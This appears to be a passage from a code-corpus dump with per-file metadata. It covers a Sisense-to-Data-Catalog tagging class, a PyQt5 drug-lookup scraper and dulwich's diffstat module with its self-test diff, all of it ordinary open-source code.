folder_id) self._set_string_field(tag, 'folder_name', folder.get('name')) datasource = dashboard_metadata.get('datasource') if datasource: self._set_string_field(tag, 'datasource', datasource.get('title')) last_publish_time = dashboard_metadata.get('lastPublish') if last_publish_time: self._set_timestamp_field( tag, 'last_publish', datetime.strptime(last_publish_time, self.__INCOMING_TIMESTAMP_UTC_FORMAT)) last_opened_time = dashboard_metadata.get('lastOpened') if last_opened_time: self._set_timestamp_field( tag, 'last_opened', datetime.strptime(last_opened_time, self.__INCOMING_TIMESTAMP_UTC_FORMAT)) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tags_for_dashboard_filters( self, jaql_tag_template: TagTemplate, dashboard_metadata: Dict[str, Any]) -> List[Tag]: tags = [] filters = dashboard_metadata.get( constants.DASHBOARD_FILTERS_FIELD_NAME) if not filters: return tags for dashboard_filter in filters: tags.extend( self.__make_tags_for_jaql(jaql_tag_template, dashboard_filter.get('jaql'), constants.ENTRY_COLUMN_FILTERS)) return tags def make_tag_for_folder(self, tag_template: TagTemplate, folder_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name # The root folder's ``oid`` field is not fulfilled. folder_id = folder_metadata.get('oid') or folder_metadata.get('name') self._set_string_field(tag, 'id', folder_id) parent = folder_metadata.get('parentFolderData') if parent: self._set_string_field(tag, 'parent_id', parent.get('oid')) self._set_string_field(tag, 'parent_name', parent.get('name')) owner = folder_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') child_folders = folder_metadata.get('folders') child_count = len(child_folders) if child_folders else 0 self._set_bool_field(tag, 'has_children', child_count > 0) if child_count: self._set_double_field(tag, 'child_count', child_count) dashboards = folder_metadata.get('dashboards') dashboard_count = len(dashboards) if dashboards else 0 self._set_bool_field(tag, 'has_dashboards', dashboard_count > 0) if dashboard_count: self._set_double_field(tag, 'dashboard_count', dashboard_count) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tag_for_widget(self, tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> Tag: tag = datacatalog.Tag() tag.template = tag_template.name self._set_string_field(tag, 'id', widget_metadata.get('oid')) self._set_string_field(tag, 'type', widget_metadata.get('type')) self._set_string_field(tag, 'subtype', widget_metadata.get('subtype')) owner = widget_metadata.get('ownerData') if owner: self._set_string_field(tag, 'owner_username', owner.get('userName')) first_name = owner.get('firstName') or '' last_name = owner.get('lastName') or '' self._set_string_field(tag, 'owner_name', f'{first_name} {last_name}') dashboard = widget_metadata.get('dashboardData') self._set_string_field(tag, 'dashboard_id', dashboard.get('oid')) self._set_string_field(tag, 'dashboard_title', dashboard.get('title')) datasource = widget_metadata.get('datasource') if isinstance(datasource, dict): self._set_string_field(tag, 'datasource', datasource.get('title')) elif isinstance(datasource, str): self._set_string_field(tag, 'datasource', datasource) self._set_string_field(tag, 'server_url', self.__server_address) return tag def make_tags_for_widget_fields( self, jaql_tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> List[Tag]: tags = [] if not (widget_metadata.get('metadata') and widget_metadata['metadata'].get('panels')): return tags panels = widget_metadata['metadata']['panels'] fields = [ panel for panel in panels if not panel.get('name') == constants.WIDGET_FILTERS_PANEL_NAME ] if not fields: return tags for field in fields: for item in field.get('items'): tags.extend( self.__make_tags_for_jaql(jaql_tag_template, item.get('jaql'), constants.ENTRY_COLUMN_FIELDS)) return tags def make_tags_for_widget_filters( self, jaql_tag_template: TagTemplate, widget_metadata: Dict[str, Any]) -> List[Tag]: tags = [] if not (widget_metadata.get('metadata') and widget_metadata['metadata'].get('panels')): return tags panels = widget_metadata['metadata']['panels'] filters = next( (panel.get('items') for panel in panels if panel.get('name') == constants.WIDGET_FILTERS_PANEL_NAME), None) if not filters: return tags for widget_filter in filters: tags.extend( self.__make_tags_for_jaql(jaql_tag_template, widget_filter.get('jaql'), constants.ENTRY_COLUMN_FILTERS)) return tags def __make_tags_for_jaql(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> List[Tag]: tags = [] if not jaql_metadata: return tags tag = datacatalog.Tag() tag.template = tag_template.name dim_table = None dim_column = None dimension = jaql_metadata.get('dim') if dimension: self._set_string_field(tag, 'dimension', dimension) # According to the Sisense Support Team, JAQL objects should # contain the ``table`` and ``column`` fields, but we have seen # some cases in which it does not happen -- e.g.: dashboards that # were created a long time ago and migrated from version to # version, as well as from platform to platform (Windows to Linux), # have the ``dim`` field, but not ``table`` and ``column``. So, we # decided to scrape table and column metadata from the dimension # when the appropriate fields are not available to avoid losing # relevant lineage information. A regex is used to do so. dim_match = re.search(r'^\[(?P<table>.*)\.(?P<column>.*)]$', dimension) dim_table = dim_match.group('table') dim_column = dim_match.group('column') self._set_string_field(tag, 'table', jaql_metadata.get('table') or dim_table) self._set_string_field(tag, 'column', jaql_metadata.get('column') or dim_column) formula = jaql_metadata.get(constants.JAQL_FORMULA_FIELD_NAME) context = jaql_metadata.get(constants.JAQL_CONTEXT_FIELD_NAME) human_readable_formula = formula # The formula and its fields (aka parts) are stored in distinct fields, # ``formula`` and ``context``. The below code seeks to replace the part # identifiers, usually system-generated strings, with the part titles, # which are human-readable strings. On success, the resulting formula # is equal to what Sisense shows to users in the UI. if formula and context: parts = re.findall(r'\[(.*?)]', formula) for part in parts: part_metadata = context.get(f'[{part}]') if not part_metadata: continue part_title = part_metadata.get('title') if part_title: human_readable_formula = human_readable_formula.replace( part, part_title) self._set_string_field(tag, 'formula', human_readable_formula) self._set_string_field(tag, 'aggregation', jaql_metadata.get('agg')) self._set_string_field(tag, 'server_url', self.__server_address) title = jaql_metadata.get('title') subcolumn_name = sisense_connector_strings_helper\ .SisenseConnectorStringsHelper.format_column_name(title) tag.column = f'{column_prefix}.{subcolumn_name}' tags.append(tag) tags.extend( self.__make_tags_for_jaql_formula(tag_template, jaql_metadata, tag.column)) filter_by_tag = self.__make_tag_for_jaql_filter_by( tag_template, jaql_metadata, tag.column) if filter_by_tag: tags.append(filter_by_tag) return tags def __make_tags_for_jaql_formula(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> List[Tag]: tags = [] formula = jaql_metadata.get(constants.JAQL_FORMULA_FIELD_NAME) context = jaql_metadata.get(constants.JAQL_CONTEXT_FIELD_NAME) if not (formula and context): return tags parts = re.findall(r'\[(.*?)]', formula) for part in parts: tags.extend( self.__make_tags_for_jaql( tag_template, context.get(f'[{part}]'), f'{column_prefix}.{constants.ENTRY_COLUMN_FORMULA}')) return tags def __make_tag_for_jaql_filter_by(self, tag_template: TagTemplate, jaql_metadata: Dict[str, Any], column_prefix: str) -> Optional[Tag]: jaql_filter = jaql_metadata.get(constants.JAQL_FILTER_FIELD_NAME) if not jaql_filter: return tags = self.__make_tags_for_jaql( tag_template, jaql_filter.get(constants.JAQL_FILTER_BY_FIELD_NAME), f'{column_prefix}.{constants.ENTRY_COLUMN_FILTER_BY}') return tags[0] if tags else None
en
0.904791
#!/usr/bin/python # # Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # The root folder's ``oid`` field is not fulfilled. # The root folder's ``oid`` field is not fulfilled. # According to the Sisense Support Team, JAQL objects should # contain the ``table`` and ``column`` fields, but we have seen # some cases in which it does not happen -- e.g.: dashboards that # were created a long time ago and migrated from version to # version, as well as from platform to platform (Windows to Linux), # have the ``dim`` field, but not ``table`` and ``column``. So, we # decided to scrape table and column metadata from the dimension # when the appropriate fields are not available to avoid losing # relevant lineage information. A regex is used to do so. # The formula and its fields (aka parts) are stored in distinct fields, # ``formula`` and ``context``. The below code seeks to replace the part # identifiers, usually system-generated strings, with the part titles, # which are human-readable strings. On success, the resulting formula # is equal to what Sisense shows to users in the UI.
2.002572
2
helpers/drugui.py
teghdeep/Build_It_Up
0
6628990
<filename>helpers/drugui.py<gh_stars>0 from PyQt5 import QtCore, QtGui, QtWidgets from bs4 import BeautifulSoup import requests import html5lib from PyQt5.QtWidgets import QMessageBox class Ui_Drugs(object): def setupUi(self, Drugs): Drugs.setObjectName("Drugs") Drugs.resize(572, 449) font = QtGui.QFont() font.setFamily("Nunito") font.setPointSize(12) font.setBold(False) font.setItalic(False) font.setWeight(9) Drugs.setFont(font) Drugs.setStyleSheet("background-color: rgb(44, 51, 54);\n" "font: 75 12pt \"Nunito\";\n" "color:white;\n" "") self.centralwidget = QtWidgets.QWidget(Drugs) self.centralwidget.setObjectName("centralwidget") self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(200, 50, 231, 51)) self.label.setStyleSheet("color: cyan;\n" "font: 81 24pt \"Nunito ExtraBold\";") self.label.setObjectName("label") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(20, 200, 241, 31)) self.label_2.setStyleSheet("font: 81 14pt \"Nunito ExtraBold\";") self.label_2.setObjectName("label_2") self.drugsearch = QtWidgets.QLineEdit(self.centralwidget) self.drugsearch.setGeometry(QtCore.QRect(290, 200, 221, 31)) self.drugsearch.setStyleSheet("background-color: rgb(255, 255, 255);\n" "border-radius:10px;\n" "font: 87 12pt \"Nunito\";\n" "color:black;") self.drugsearch.setObjectName("drugsearch") self.drugres = QtWidgets.QTextBrowser(self.centralwidget) self.drugres.setGeometry(QtCore.QRect(180, 330, 231, 41)) self.drugres.setStyleSheet("background-color: rgb(255, 255, 255);\n" "border-radius:10px;\n" "font: 87 12pt \"Nunito\";\n" "color:black;") self.drugres.setObjectName("drugres") self.drugo = QtWidgets.QPushButton(self.centralwidget) self.drugo.setGeometry(QtCore.QRect(220, 270, 151, 31)) self.drugo.setStyleSheet("border-radius:10px;\n" "background-color: #3CB7A1;\n" "color: white;") self.drugo.setObjectName("drugo") Drugs.setCentralWidget(self.centralwidget) self.retranslateUi(Drugs) QtCore.QMetaObject.connectSlotsByName(Drugs) self.drugo.clicked.connect(self.getDrug) def getDrug(self): try: disease = self.drugsearch.text() url = f"https://www.medindia.net/drugs/medical-condition/{disease}.htm" html_content = requests.get(url) soup = BeautifulSoup(html_content.content,"html5lib") main_class = soup.find_all("article")[0] link = main_class.find_all("a") self.drugres.append(str(link[0].getText())) except: msg = QMessageBox() msg.setIcon(QMessageBox.Warning) msg.setText("Zero Input Error") msg.setInformativeText("An error occured") msg.setWindowTitle('Error') msg.exec_() def retranslateUi(self, Drugs): _translate = QtCore.QCoreApplication.translate Drugs.setWindowTitle(_translate("Drugs", "Drugs")) self.label.setText(_translate("Drugs", "Find Drugs")) self.label_2.setText(_translate("Drugs", "Enter disease to find drugs")) self.drugo.setText(_translate("Drugs", "Search")) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Drugs = QtWidgets.QMainWindow() ui = Ui_Drugs() ui.setupUi(Drugs) Drugs.show() sys.exit(app.exec_())
<filename>helpers/drugui.py<gh_stars>0 from PyQt5 import QtCore, QtGui, QtWidgets from bs4 import BeautifulSoup import requests import html5lib from PyQt5.QtWidgets import QMessageBox class Ui_Drugs(object): def setupUi(self, Drugs): Drugs.setObjectName("Drugs") Drugs.resize(572, 449) font = QtGui.QFont() font.setFamily("Nunito") font.setPointSize(12) font.setBold(False) font.setItalic(False) font.setWeight(9) Drugs.setFont(font) Drugs.setStyleSheet("background-color: rgb(44, 51, 54);\n" "font: 75 12pt \"Nunito\";\n" "color:white;\n" "") self.centralwidget = QtWidgets.QWidget(Drugs) self.centralwidget.setObjectName("centralwidget") self.label = QtWidgets.QLabel(self.centralwidget) self.label.setGeometry(QtCore.QRect(200, 50, 231, 51)) self.label.setStyleSheet("color: cyan;\n" "font: 81 24pt \"Nunito ExtraBold\";") self.label.setObjectName("label") self.label_2 = QtWidgets.QLabel(self.centralwidget) self.label_2.setGeometry(QtCore.QRect(20, 200, 241, 31)) self.label_2.setStyleSheet("font: 81 14pt \"Nunito ExtraBold\";") self.label_2.setObjectName("label_2") self.drugsearch = QtWidgets.QLineEdit(self.centralwidget) self.drugsearch.setGeometry(QtCore.QRect(290, 200, 221, 31)) self.drugsearch.setStyleSheet("background-color: rgb(255, 255, 255);\n" "border-radius:10px;\n" "font: 87 12pt \"Nunito\";\n" "color:black;") self.drugsearch.setObjectName("drugsearch") self.drugres = QtWidgets.QTextBrowser(self.centralwidget) self.drugres.setGeometry(QtCore.QRect(180, 330, 231, 41)) self.drugres.setStyleSheet("background-color: rgb(255, 255, 255);\n" "border-radius:10px;\n" "font: 87 12pt \"Nunito\";\n" "color:black;") self.drugres.setObjectName("drugres") self.drugo = QtWidgets.QPushButton(self.centralwidget) self.drugo.setGeometry(QtCore.QRect(220, 270, 151, 31)) self.drugo.setStyleSheet("border-radius:10px;\n" "background-color: #3CB7A1;\n" "color: white;") self.drugo.setObjectName("drugo") Drugs.setCentralWidget(self.centralwidget) self.retranslateUi(Drugs) QtCore.QMetaObject.connectSlotsByName(Drugs) self.drugo.clicked.connect(self.getDrug) def getDrug(self): try: disease = self.drugsearch.text() url = f"https://www.medindia.net/drugs/medical-condition/{disease}.htm" html_content = requests.get(url) soup = BeautifulSoup(html_content.content,"html5lib") main_class = soup.find_all("article")[0] link = main_class.find_all("a") self.drugres.append(str(link[0].getText())) except: msg = QMessageBox() msg.setIcon(QMessageBox.Warning) msg.setText("Zero Input Error") msg.setInformativeText("An error occured") msg.setWindowTitle('Error') msg.exec_() def retranslateUi(self, Drugs): _translate = QtCore.QCoreApplication.translate Drugs.setWindowTitle(_translate("Drugs", "Drugs")) self.label.setText(_translate("Drugs", "Find Drugs")) self.label_2.setText(_translate("Drugs", "Enter disease to find drugs")) self.drugo.setText(_translate("Drugs", "Search")) if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Drugs = QtWidgets.QMainWindow() ui = Ui_Drugs() ui.setupUi(Drugs) Drugs.show() sys.exit(app.exec_())
zh
0.453391
#3CB7A1;\n"
2.355406
2
dist/dulwich/contrib/diffstat.py
evandroforks/CrowdAnki
2
6628991
#!/usr/bin/env python # -*- coding: utf-8 -*- # vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab # Copyright (c) 2020 <NAME>, Stratford Ontario Canada # All rights reserved. # # This diffstat code was extracted and heavily modified from: # # https://github.com/techtonik/python-patch # Under the following license: # # Patch utility to apply unified diffs # Brute-force line-by-line non-recursive parsing # # Copyright (c) 2008-2016 <NAME> # Available under the terms of MIT license # # and falls under the exact same MIT license import sys import re # only needs to detect git style diffs as this is for # use with dulwich _git_header_name = re.compile(br'diff --git a/(.*) b/(.*)') _GIT_HEADER_START = b'diff --git a/' _GIT_BINARY_START = b'Binary file' _GIT_RENAMEFROM_START = b'rename from' _GIT_RENAMETO_START = b'rename to' _GIT_CHUNK_START = b'@@' _GIT_ADDED_START = b'+' _GIT_DELETED_START = b'-' _GIT_UNCHANGED_START = b' ' # emulate original full Patch class by just extracting # filename and minimal chunk added/deleted information to # properly interface with diffstat routine def _parse_patch(lines): """An internal routine to parse a git style diff or patch to generate diff stats Args: lines: list of byte strings "lines" from the diff to be parsed Returns: A tuple (names, nametypes, counts) of three lists: names = list of repo relative file paths nametypes - list of booolean values indicating if file is binary (True means binary file) counts = list of tuples of (added, deleted) counts for that file """ names = [] nametypes = [] counts = [] in_patch_chunk = in_git_header = binaryfile = False currentfile = None added = deleted = 0 for line in lines: if line.startswith(_GIT_HEADER_START): if currentfile is not None: names.append(currentfile) nametypes.append(binaryfile) counts.append((added, deleted)) currentfile = _git_header_name.search(line).group(2) binaryfile = False added = deleted = 0 in_git_header = True in_patch_chunk = False elif line.startswith(_GIT_BINARY_START) and in_git_header: binaryfile = True in_git_header = False elif line.startswith(_GIT_RENAMEFROM_START) and in_git_header: currentfile = line[12:] elif line.startswith(_GIT_RENAMETO_START) and in_git_header: currentfile += b' => %s' % line[10:] elif line.startswith(_GIT_CHUNK_START) and \ (in_patch_chunk or in_git_header): in_patch_chunk = True in_git_header = False elif line.startswith(_GIT_ADDED_START) and in_patch_chunk: added += 1 elif line.startswith(_GIT_DELETED_START) and in_patch_chunk: deleted += 1 elif not line.startswith(_GIT_UNCHANGED_START) and in_patch_chunk: in_patch_chunk = False # handle end of input if currentfile is not None: names.append(currentfile) nametypes.append(binaryfile) counts.append((added, deleted)) return names, nametypes, counts # note must all done using bytes not string because on linux filenames # may not be encodable even to utf-8 def diffstat(lines, max_width=80): """Generate summary statistics from a git style diff ala (git diff tag1 tag2 --stat) Args: lines: list of byte string "lines" from the diff to be parsed max_width: maximum line length for generating the summary statistics (default 80) Returns: A byte string that lists the changed files with change counts and histogram """ names, nametypes, counts = _parse_patch(lines) insert = [] delete = [] namelen = 0 maxdiff = 0 # max changes for any file used for histogram width calc for i, filename in enumerate(names): i, d = counts[i] insert.append(i) delete.append(d) namelen = max(namelen, len(filename)) maxdiff = max(maxdiff, i+d) output = b'' statlen = len(str(maxdiff)) # stats column width for i, n in enumerate(names): binaryfile = nametypes[i] # %-19s | %-4d %s # note b'%d' % namelen is not supported until Python 3.5 # To convert an int to a format width specifier for byte # strings use str(namelen).encode('ascii') format = b' %-' + str(namelen).encode('ascii') + \ b's | %' + str(statlen).encode('ascii') + b's %s\n' binformat = b' %-' + str(namelen).encode('ascii') + b's | %s\n' if not binaryfile: hist = b'' # -- calculating histogram -- width = len(format % (b'', b'', b'')) histwidth = max(2, max_width - width) if maxdiff < histwidth: hist = b'+'*insert[i] + b'-'*delete[i] else: iratio = (float(insert[i]) / maxdiff) * histwidth dratio = (float(delete[i]) / maxdiff) * histwidth iwidth = dwidth = 0 # make sure every entry that had actual insertions gets # at least one + if insert[i] > 0: iwidth = int(iratio) if iwidth == 0 and 0 < iratio < 1: iwidth = 1 # make sure every entry that had actual deletions gets # at least one - if delete[i] > 0: dwidth = int(dratio) if dwidth == 0 and 0 < dratio < 1: dwidth = 1 hist = b'+'*int(iwidth) + b'-'*int(dwidth) output += (format % (bytes(names[i]), str(insert[i] + delete[i]).encode('ascii'), hist)) else: output += (binformat % (bytes(names[i]), b'Bin')) output += (b' %d files changed, %d insertions(+), %d deletions(-)' % (len(names), sum(insert), sum(delete))) return output def main(): argv = sys.argv # allow diffstat.py to also be used from the comand line if len(sys.argv) > 1: diffpath = argv[1] data = b'' with open(diffpath, 'rb') as f: data = f.read() lines = data.split(b'\n') result = diffstat(lines) print(result.decode('utf-8')) return 0 # if no path argument to a diff file is passed in, run # a self test. The test case includes tricky things like # a diff of diff, binary files, renames with futher changes # added files and removed files. # All extracted from Sigil-Ebook/Sigil's github repo with # full permission to use under this license. selftest = b""" diff --git a/docs/qt512.7_remove_bad_workaround.patch b/docs/qt512.7_remove_bad_workaround.patch new file mode 100644 index 00000000..64e34192 --- /dev/null +++ b/docs/qt512.7_remove_bad_workaround.patch @@ -0,0 +1,15 @@ +--- qtbase/src/gui/kernel/qwindow.cpp.orig 2019-12-12 09:15:59.000000000 -0500 ++++ qtbase/src/gui/kernel/qwindow.cpp 2020-01-10 10:36:53.000000000 -0500 +@@ -218,12 +218,6 @@ + QGuiApplicationPrivate::window_list.removeAll(this); + if (!QGuiApplicationPrivate::is_app_closing) + QGuiApplicationPrivate::instance()->modalWindowList.removeOne(this); +- +- // focus_window is normally cleared in destroy(), but the window may in +- // some cases end up becoming the focus window again. Clear it again +- // here as a workaround. See QTBUG-75326. +- if (QGuiApplicationPrivate::focus_window == this) +- QGuiApplicationPrivate::focus_window = 0; + } + + void QWindowPrivate::init(QScreen *targetScreen) diff --git a/docs/testplugin_v017.zip b/docs/testplugin_v017.zip new file mode 100644 index 00000000..a4cf4c4c Binary files /dev/null and b/docs/testplugin_v017.zip differ diff --git a/ci_scripts/macgddeploy.py b/ci_scripts/gddeploy.py similarity index 73% rename from ci_scripts/macgddeploy.py rename to ci_scripts/gddeploy.py index a512d075..f9dacd33 100644 --- a/ci_scripts/macgddeploy.py +++ b/ci_scripts/gddeploy.py @@ -1,19 +1,32 @@ #!/usr/bin/env python3 import os +import sys import subprocess import datetime import shutil +import glob gparent = os.path.expandvars('$GDRIVE_DIR') grefresh_token = os.path.expandvars('$GDRIVE_REFRESH_TOKEN') -travis_branch = os.path.expandvars('$TRAVIS_BRANCH') -travis_commit = os.path.expandvars('$TRAVIS_COMMIT') -travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') +if sys.platform.lower().startswith('darwin'): + travis_branch = os.path.expandvars('$TRAVIS_BRANCH') + travis_commit = os.path.expandvars('$TRAVIS_COMMIT') + travis_build_number = os.path.expandvars('$TRAVIS_BUILD_NUMBER') + + origfilename = './bin/Sigil.tar.xz' + newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_numbe\ r) +else: + appveyor_branch = os.path.expandvars('$APPVEYOR_REPO_BRANCH') + appveyor_commit = os.path.expandvars('$APPVEYOR_REPO_COMMIT') + appveyor_build_number = os.path.expandvars('$APPVEYOR_BUILD_NUMBER') + names = glob.glob('.\\installer\\Sigil-*-Setup.exe') + if not names: + exit(1) + origfilename = names[0] + newfilename = '.\\installer\\Sigil-{}-{}-build_num-{}-Setup.exe'.format(appveyor_branch, appveyor_commit[:7], ap\ pveyor_build_number) -origfilename = './bin/Sigil.tar.xz' -newfilename = './bin/Sigil-{}-{}-build_num-{}.tar.xz'.format(travis_branch, travis_commit[:7],travis_build_number) shutil.copy2(origfilename, newfilename) folder_name = datetime.date.today() diff --git a/docs/qt512.6_backport_009abcd_fix.patch b/docs/qt512.6_backport_009abcd_fix.patch deleted file mode 100644 index f4724347..00000000 --- a/docs/qt512.6_backport_009abcd_fix.patch +++ /dev/null @@ -1,26 +0,0 @@ ---- qtbase/src/widgets/kernel/qwidget.cpp.orig 2019-11-08 10:57:07.000000000 -0500 -+++ qtbase/src/widgets/kernel/qwidget.cpp 2019-12-11 12:32:24.000000000 -0500 -@@ -8934,6 +8934,23 @@ - } - } - switch (event->type()) { -+ case QEvent::PlatformSurface: { -+ // Sync up QWidget's view of whether or not the widget has been created -+ switch (static_cast<QPlatformSurfaceEvent*>(event)->surfaceEventType()) { -+ case QPlatformSurfaceEvent::SurfaceCreated: -+ if (!testAttribute(Qt::WA_WState_Created)) -+ create(); -+ break; -+ case QPlatformSurfaceEvent::SurfaceAboutToBeDestroyed: -+ if (testAttribute(Qt::WA_WState_Created)) { -+ // Child windows have already been destroyed by QWindow, -+ // so we skip them here. -+ destroy(false, false); -+ } -+ break; -+ } -+ break; -+ } - case QEvent::MouseMove: - mouseMoveEvent((QMouseEvent*)event); - break; diff --git a/docs/Building_Sigil_On_MacOSX.txt b/docs/Building_Sigil_On_MacOSX.txt index 3b41fd80..64914c78 100644 --- a/docs/Building_Sigil_On_MacOSX.txt +++ b/docs/Building_Sigil_On_MacOSX.txt @@ -113,7 +113,7 @@ install_name_tool -add_rpath @loader_path/../../Frameworks ./bin/Sigil.app/Content # To test if the newly bundled python 3 version of Sigil is working properly ypou can do the following: -1. download testplugin_v014.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs +1. download testplugin_v017.zip from https://github.com/Sigil-Ebook/Sigil/tree/master/docs 2. open Sigil.app to the normal nearly blank template epub it generates when opened 3. use Plugins->Manage Plugins menu and make sure the "Use Bundled Python" checkbox is checked 4. use the "Add Plugin" button to navigate to and add testplugin.zip and then hit "Okay" to exit the Manage Plugins Dialog """ # noqa: E501 W293 testoutput = b""" docs/qt512.7_remove_bad_workaround.patch | 15 ++++++++++++ docs/testplugin_v017.zip | Bin ci_scripts/macgddeploy.py => ci_scripts/gddeploy.py | 0 docs/qt512.6_backport_009abcd_fix.patch | 26 --------------------- docs/Building_Sigil_On_MacOSX.txt | 2 +- 5 files changed, 16 insertions(+), 27 deletions(-)""" # noqa: W291 # return 0 on success otherwise return -1 result = diffstat(selftest.split(b'\n')) if result == testoutput: print("self test passed") return 0 print("self test failed") print("Received:") print(result.decode('utf-8')) print("Expected:") print(testoutput.decode('utf-8')) return -1 if __name__ == '__main__': sys.exit(main())
#!/usr/bin/env python # -*- coding: utf-8 -*- # vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab # Copyright (c) 2020 <NAME>, Stratford Ontario Canada # All rights reserved. # # This diffstat code was extracted and heavily modified from: # # https://github.com/techtonik/python-patch # Under the following license: # # Patch utility to apply unified diffs # Brute-force line-by-line non-recursive parsing # # Copyright (c) 2008-2016 <NAME> # Available under the terms of MIT license # # and falls under the exact same MIT license import sys import re # only needs to detect git style diffs as this is for # use with dulwich _git_header_name = re.compile(br'diff --git a/(.*) b/(.*)') _GIT_HEADER_START = b'diff --git a/' _GIT_BINARY_START = b'Binary file' _GIT_RENAMEFROM_START = b'rename from' _GIT_RENAMETO_START = b'rename to' _GIT_CHUNK_START = b'@@' _GIT_ADDED_START = b'+' _GIT_DELETED_START = b'-' _GIT_UNCHANGED_START = b' ' # emulate original full Patch class by just extracting # filename and minimal chunk added/deleted information to # properly interface with diffstat routine def _parse_patch(lines): """An internal routine to parse a git style diff or patch to generate diff stats Args: lines: list of byte strings "lines" from the diff to be parsed Returns: A tuple (names, nametypes, counts) of three lists: names = list of repo relative file paths nametypes - list of booolean values indicating if file is binary (True means binary file) counts = list of tuples of (added, deleted) counts for that file """ names = [] nametypes = [] counts = [] in_patch_chunk = in_git_header = binaryfile = False currentfile = None added = deleted = 0 for line in lines: if line.startswith(_GIT_HEADER_START): if currentfile is not None: names.append(currentfile) nametypes.append(binaryfile) counts.append((added, deleted)) currentfile = _git_header_name.search(line).group(2) binaryfile = False added = deleted = 0 in_git_header = True in_patch_chunk = False elif line.startswith(_GIT_BINARY_START) and in_git_header: binaryfile = True in_git_header = False elif line.startswith(_GIT_RENAMEFROM_START) and in_git_header: currentfile = line[12:] elif line.startswith(_GIT_RENAMETO_START) and in_git_header: currentfile += b' => %s' % line[10:] elif line.startswith(_GIT_CHUNK_START) and \ (in_patch_chunk or in_git_header): in_patch_chunk = True in_git_header = False elif line.startswith(_GIT_ADDED_START) and in_patch_chunk: added += 1 elif line.startswith(_GIT_DELETED_START) and in_patch_chunk: deleted += 1 elif not line.startswith(_GIT_UNCHANGED_START) and in_patch_chunk: in_patch_chunk = False # handle end of input if currentfile is not None: names.append(currentfile) nametypes.append(binaryfile) counts.append((added, deleted)) return names, nametypes, counts # note must all done using bytes not string because on linux filenames # may not be encodable even to utf-8 def diffstat(lines, max_width=80): """Generate summary statistics from a git style diff ala (git diff tag1 tag2 --stat) Args: lines: list of byte string "lines" from the diff to be parsed max_width: maximum line length for generating the summary statistics (default 80) Returns: A byte string that lists the changed files with change counts and histogram """ names, nametypes, counts = _parse_patch(lines) insert = [] delete = [] namelen = 0 maxdiff = 0 # max changes for any file used for histogram width calc for i, filename in enumerate(names): i, d = counts[i] insert.append(i) delete.append(d) namelen = max(namelen, len(filename)) maxdiff = max(maxdiff, i+d) output = b'' statlen = len(str(maxdiff)) # stats column width for i, n in enumerate(names): binaryfile = nametypes[i] # %-19s | %-4d %s # note b'%d' % namelen is not supported until Python 3.5 # To convert an int to a format width specifier for byte # strings use str(namelen).encode('ascii') format = b' %-' + str(namelen).encode('ascii') + \ b's | %' + str(statlen).encode('ascii') + b's %s\n' binformat = b' %-' + str(namelen).encode('ascii') + b's | %s\n' if not binaryfile: hist = b'' # -- calculating histogram -- width = len(format % (b'', b'', b'')) histwidth = max(2, max_width - width) if maxdiff < histwidth: hist = b'+'*insert[i] + b'-'*delete[i] else: iratio = (float(insert[i]) / maxdiff) * histwidth dratio = (float(delete[i]) / maxdiff) * histwidth iwidth = dwidth = 0 # make sure every entry that had actual insertions gets # at least one + if insert[i] > 0: iwidth = int(iratio) if iwidth == 0 and 0 < iratio < 1: iwidth = 1 # make sure every entry that had actual deletions gets # at least one - if delete[i] > 0: dwidth = int(dratio) if dwidth == 0 and 0 < dratio < 1: dwidth = 1 hist = b'+'*int(iwidth) + b'-'*int(dwidth) output += (format % (bytes(names[i]), str(insert[i] + delete[i]).encode('ascii'), hist)) else: output += (binformat % (bytes(names[i]), b'Bin')) output += (b' %d files changed, %d insertions(+), %d deletions(-)' % (len(names), sum(insert), sum(delete))) return output def main(): argv = sys.argv # allow diffstat.py to also be used from the comand line if len(sys.argv) > 1: diffpath = argv[1] data = b'' with open(diffpath, 'rb') as f: data = f.read() lines = data.split(b'\n') result = diffstat(lines) print(result.decode('utf-8')) return 0 # if no path argument to a diff file is passed in, run # a self test. The test case includes tricky things like # a diff of diff, binary files, renames with futher changes # added files and removed files. # All extracted from Sigil-Ebook/Sigil's github repo with # full permission to use under this license. selftest = b""" diff --git a/docs/qt512.7_remove_bad_workaround.patch b/docs/qt512.7_remove_bad_workaround.patch new file mode 100644 index 00000000..64e34192 --- /dev/null +++ b/docs/qt512.7_remove_bad_workaround.patch @@ -0,0 +1,15 @@ +--- qtbase/src/gui/kernel/qwindow.cpp.orig 2019-12-12 09:15:59.000000000 -0500 ++++ qtbase/src/gui/kernel/qwindow.cpp 2020-01-10 10:36:53.000000000 -0500 +@@ -218,12 +218,6 @@ + QGuiApplicationPrivate::window_list.removeAll(this); + if (!QGuiApplicationPrivate::is_app_closing) + QGuiApplicationPrivate::instance()->modalWindowList.removeOne(this); +- +- // focus_window is normally cleared in destroy(), but the window may in +- // some cases end up becoming the focus window again. Clear it again +- // here as a workaround. See QTBUG-75326. +- if (QGuiApplicationPrivate::focus_window == this) +- QGuiApplicationPrivate::focus_window 